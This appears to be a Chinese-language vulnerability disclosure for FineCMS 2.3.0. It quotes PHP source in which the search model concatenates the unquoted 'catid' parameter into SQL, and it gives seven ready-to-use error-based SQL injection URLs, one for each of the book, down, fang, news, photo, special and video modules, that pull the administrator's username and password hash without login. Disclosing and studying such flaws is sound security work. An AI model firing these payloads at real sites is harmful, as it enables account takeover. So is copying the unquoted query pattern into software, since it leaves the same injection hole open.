### 简要描述:
FineCMS设计缺陷导致大面积SQL注入
### 详细说明:
finecms最新版2.3.0,官方2014年4月18号更新。
finecms某功能存在SQL注入,无需登陆,可直接注入获取管理员账号。
此功能在多个模块使用,导致注入大面积爆发。
此漏洞整个MCS都在使用,导致漏洞大面积存在。
文件/FineCMSv2.3.0/dayrui/core/D_Module.php:
```
/**
* 模块内容搜索页
*/
protected function _search() {
$this->load->model('search_model');
$mod = $this->get_cache
('module-'.SITE_ID.'-'.APP_DIR);
// 清除过期缓存
$this->search_model->clear($mod
['setting']['search']['cache']);
// 搜索参数
$get = $this->input->get(NULL, TRUE);
$get = isset($get['rewrite']) ?
dr_rewrite_decode($get['rewrite']) : $get;
$id = $get['id'];
$catid = (int)$get['catid'];
$get['keyword'] = str_replace(array
('%', ' '), array('', '%'), $get['keyword']);
unset($get['c'], $get['m'], $get
['id'], $get['page']);
// 关键字个数判断
if ($get['keyword'] && strlen($get
['keyword']) < (int)$mod['setting']['search']
['length']) {
$this->msg(lang('mod-31'));
}
if ($id) { // 读缓存数据
$data = $this->search_model-
>get($id);
$catid = $data['catid'];
$data['get'] = $data
['params'];
if (!$data) {
$this->msg(lang('mod-32'));
}
} else { // 组合搜索条件
$data = $this->search_model-
>set($get);
}
list($parent, $related) = $this-
>_related_cat($mod, $catid);
$urlrule = $mod['setting']['search']
['rewrite'] ? 'search-id-{id}-page-{page}.html' :
'index.php?c=search&id={id}&page={page}';
$this->template->assign
(dr_category_seo($mod, $mod['category'][$catid], max
(1, (int)$this->input->get('page'))));
$this->template->assign(array(
'get' => $get,
'cat' => $mod['category']
[$catid],
'caitd' => $catid,
'parent' => $parent,
'related' => $related,
'keyword' => $get['keyword'],
'urlrule' => str_replace
('{id}', $data['id'], $urlrule),
));
$this->template->assign($data);
$this->template->display
('search.html');
}
/**
* 顶级可用栏目
*/
public function show_select_category() {
$data = array();
$category = $this->get_cache
('module-'.SITE_ID.'-'.APP_DIR, 'category');
foreach ($category as $t) {
if (!$t['child'] && $t
['permission'][$this->member['mark']]['add']) {
$pids = explode(',',
$t['pids']);
$pid = (int)$pids[1];
if (isset($category
[$pid])) {
$category
[$pid]['mark'] = 1;
$data[$pid] =
$category[$pid];
}
}
}
$this->template->assign(array(
'id' => 2,
'list' => $data
));
$this->template->display
('category_select.html');
}
```
在组合搜索条件时处理了get参数。
文件,/FineCMS v2.3.0/dayrui/models/Search_model.php:
```
public function set($get) {
// 查询表名称
$table = $this->db->dbprefix
(SITE_ID.'_'.APP_DIR);
$table_more = $this->db->dbprefix
(SITE_ID.'_'.APP_DIR.'_category_data');
.........
// 栏目的字段
if ($get['catid']) {
$more = FALSE;
$cat_field = $module
['category'][$get['catid']]['field'];
$where[0] = '`'.
$table.'`.`catid`'.($module['category'][$get
['catid']]['child'] ? 'IN ('.$module['category'][$get
['catid']]['childids'].')' : '='.$get['catid']);
if ($cat_field) {
foreach ($cat_field as
$name => $field) {
if (isset
($get[$name]) && $get[$name]) {
$more
= TRUE;
$where[] = $this->_where($table_more, $name, $get
[$name], $cat_field);
}
if (isset
($_order_by[$name])) {
$more
= TRUE;
$order_by[] = '`'.$table.'`.`'.$name.'` '.$_order_by
[$name];
}
}
}
if ($more) $from.= ' LEFT JOIN
`'.$table_more.'` ON `'.$table.'`.`id`=`'.
$table_more.'`.`id`';
}
.........
```
在处理栏目字段时:
```
$where[0] = '`'.$table.'`.`catid`'.($module
['category'][$get['catid']]['child'] ? 'IN ('.$module
['category'][$get['catid']]['childids'].')' : '='.
$get['catid']);
```
对参数carid没有加引号保护,导致SQL注入。
此问题在多个模块都进行了引用,导致多个漏洞存在。
具体见漏洞证明。
### 漏洞证明:
第一处SQL注入,在book模块处:
```
http://localhost/book/index.php?c=search&catid=23%20and%201=2%20AND%20(SELECT%203002%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(USERNAME,0x23,PASSWORD)%20FROM%20FINECMS_MEMBER%20LIMIT%200,1),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&price=1000,2000
```
第二处SQL注入,在down模块处:
```
http://localhost/down/index.php?c=search&catid=23%20and%201=2%20AND%20(SELECT%203002%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(USERNAME,0x23,PASSWORD)%20FROM%20FINECMS_MEMBER%20LIMIT%200,1),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&price=1000,2000
```
第三处SQL注入,在fang模块处:
```
http://localhost/fang/index.php?c=search&catid=23%20and%201=2%20AND%20(SELECT%203002%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(USERNAME,0x23,PASSWORD)%20FROM%20FINECMS_MEMBER%20LIMIT%200,1),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&price=1000,2000
```
第四处SQL注入,在news模块处:
```
http://localhost/news/index.php?c=search&catid=23%20and%201=2%20AND%20(SELECT%203002%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(USERNAME,0x23,PASSWORD)%20FROM%20FINECMS_MEMBER%20LIMIT%200,1),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&price=1000,2000
```
第五处SQL注入,在photo模块处:
```
http://localhost/photo/index.php?c=search&catid=23%20and%201=2%20AND%20(SELECT%203002%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(USERNAME,0x23,PASSWORD)%20FROM%20FINECMS_MEMBER%20LIMIT%200,1),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&price=1000,2000
```
第六处SQL注入,在special模块处:
```
http://localhost/special/index.php?c=search&catid=23%20and%201=2%20AND%20(SELECT%203002%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(USERNAME,0x23,PASSWORD)%20FROM%20FINECMS_MEMBER%20LIMIT%200,1),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&price=1000,2000
```
第七处SQL注入,在video模块处:
```
http://localhost/video/index.php?c=search&catid=23%20and%201=2%20AND%20(SELECT%203002%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(USERNAME,0x23,PASSWORD)%20FROM%20FINECMS_MEMBER%20LIMIT%200,1),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&price=1000,2000
```
暂无评论